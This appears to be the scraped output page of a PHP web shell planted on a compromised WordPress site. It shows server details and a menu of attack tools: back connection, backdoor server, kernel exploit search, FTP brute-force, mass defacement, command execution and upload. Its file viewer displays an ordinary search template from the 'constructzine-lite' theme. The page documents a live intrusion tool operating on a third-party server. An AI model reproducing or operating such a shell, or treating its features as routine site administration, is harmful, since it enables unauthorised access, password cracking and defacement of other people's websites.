IP Address: 80.252.133.24:443 You: 216.73.216.149
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ home/ mar/ bak/ sdam-objekt.ru/ constructzine-lite/ - drwxr-xr-x |
Viewing file:
Select action/file-type:
<?php
/*
* The template for displaying Search.
*
* @package ThemeIsle
*/
get_header();
?>
<div id="main-content">
<div class="inner cf">
<div class="blog-left">
<div class="blog-left-title">
<?php _e( 'Search: ', 'constructzine-lite' ); ?> <?php the_search_query(); ?>
</div>
<!--/.blog-left-title-->
<?php
if ( have_posts() ) {
while ( have_posts() ) {
the_post();
$featured_image = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'single-post-thumbnail' ); ?>
<article>
<a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>" class="post-title">
<?php the_title(); ?>
</a><!--/.post-title-->
<div class="post-meta">
<?php _e( 'Posted by', 'constructzine-lite' ); ?> <?php the_author_posts_link(); ?> <?php _e( 'in', 'constructzine-lite' ); ?> <?php the_category( ', ' ); ?>
, <?php _e( 'on', 'constructzine-lite' ); ?> <?php echo the_time( get_option( 'date_format' ) ); ?>
</div>
<!--/.post-meta-->
<div class="post-image">
<?php
if ( $featured_image != null ) {
?>
<img src="<?php echo $featured_image[0]; ?>" alt="<?php the_title(); ?>"
title="<?php the_title(); ?>"/>
<?php
}
?>
</div>
<!--/.post-image-->
<div class="post-entry">
<?php the_excerpt(); ?>
</div>
<!--/.post-entry-->
<div class="post-footer">
<ul>
<li class="comments-icon">
<a href="<?php the_permalink(); ?>#comments"
title="<?php comments_number( 'No Comments', 'One Comment', '% Comments' ); ?>">
<?php comments_number( 'No Comments', 'One Comment', '% Comments' ); ?>
</a>
</li>
<li><a href="<?php the_permalink(); ?>"
title="<?php _e( 'Read more...', 'constructzine-lite' ); ?>"><?php _e( 'Read more...', 'constructzine-lite' ); ?></a>
</li>
</ul>
</div>
<!--/.post-footer-->
</article><!--/article-->
<?php
}
} else {
?>
<article>
<h1 class="post-title">
<?php _e( 'It looks like we couldn\'t find what you were looking for!', 'constructzine-lite' ); ?>
</h1><!--/.post-tytle-->
<div class="post-entry">
<?php
echo '<p>' . __( 'Try a different search. Thank you!', 'constructzine-lite' ) . '</p>';
?>
</div>
<!--/.post-entry-->
</article>
<?php
}
?>
<?php
ti_constructzine_pagination();
?>
</div>
<!--/.blog-left-->
<?php get_sidebar(); ?>
</div>
</div>
<?php get_footer(); ?>
|
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ Ú |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |